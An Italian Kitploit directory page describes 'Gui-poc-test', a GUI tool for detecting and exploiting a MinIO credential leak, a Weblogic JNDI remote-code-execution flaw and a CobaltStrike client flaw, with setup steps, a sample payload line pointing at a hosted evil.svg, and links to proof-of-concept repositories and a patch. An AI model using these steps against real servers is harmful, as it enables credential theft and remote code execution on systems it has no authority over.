Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Gui-poc-test — Uno strumento di testing per CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
Strumenti/GitHubGitHub/romanc9/gui-poc-test
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSviluppo Payload
GitHubromanc9/gui-poc-test

Gui-poc-test

Uno strumento di testing per CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Gui-poc-test

Uno strumento di test per CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Strumento di rilevamento e sfruttamento delle vulnerabilità con interfaccia grafica per queste tre vulnerabilità.

Avvertenze

  1. Per eseguire il jar è necessario Java 8.

  2. Pensato per un singolo target, non adatto per scansioni di vulnerabilità su più IP.

  3. Per lo sfruttamento della vulnerabilità Weblogic durante il packaging è necessario includere wlfullclient.jar; va aggiunto manualmente.

Utilizzo

java -jar Gui-poc-test.jar

Istruzioni: ci sono due pulsanti, "Rilevamento" e "Sfruttamento". Il tool mostra suggerimenti nell'interfaccia per ciascuna vulnerabilità.

MinIO – Fuga di informazioni:

Inserisci il target; non serve specificare la porta, di default è 9000, ma può essere modificata (vedi sorgente GuiDemo.java:line144).

Vengono mostrati MINIO_ROOT_USER e MINIO_ROOT_PASSWORD, ecc.

image

Weblogic RCE

Inserisci IP del target, porta e indirizzo del server LDAP.

Rilevamento:

image

Attenzione: per lo sfruttamento è necessario configurare un server LDAP (pubblico).

  • Strumento di sfruttamento JNDI: utilizza lo strumento JNDIExploit.jar per avviare i servizi LDAP e WEB, fai riferimento a https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. Dopo aver selezionato la vulnerabilità, viene mostrato il metodo di auto‑verifica; puoi testare la presenza della vulnerabilità inserendo il codice di rilevamento nel listener di CobaltStrike.
  2. Prerequisito per lo sfruttamento: aver già ottenuto il trojan (exe) della vittima localmente.
  3. Requisiti dell'ambiente: Windows, Python 3, installazione di frida-tools tramite pip3.
  4. Python deve essere nel PATH di sistema.
  5. Configura un server per ospitare i file SVG e JAR, accessibile dalla vittima.
  6. Inserisci il percorso assoluto dell'exe e l'URL del file SVG, separati da uno spazio, quindi clicca su "Esegui" per attivare la contro‑misura.
  7. Il contenuto del file JAR è personalizzabile; l'esempio fornito apre la calcolatrice.
  8. Il nome predefinito del trojan è "beacon"; può essere modificato (vedi sorgente cve_2022_39197.py:line28).

Esempio di payload: beacon.exe http://127.0.0.1:4444/evil.svg

Risultato: il trojan viene eseguito su Windows e il client CobaltStrike su Mac si connette.

Contemporaneamente, il client CobaltStrike esegue il contenuto del JAR e apre la calcolatrice.

image

Su Windows viene registrato l'indirizzo di accesso del CobaltStrike.

image

Riferimenti

Principio: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

Patch per CobaltStrike: https://github.com/burpheart/CVE-2022-39197-patch

Scarica lo strumento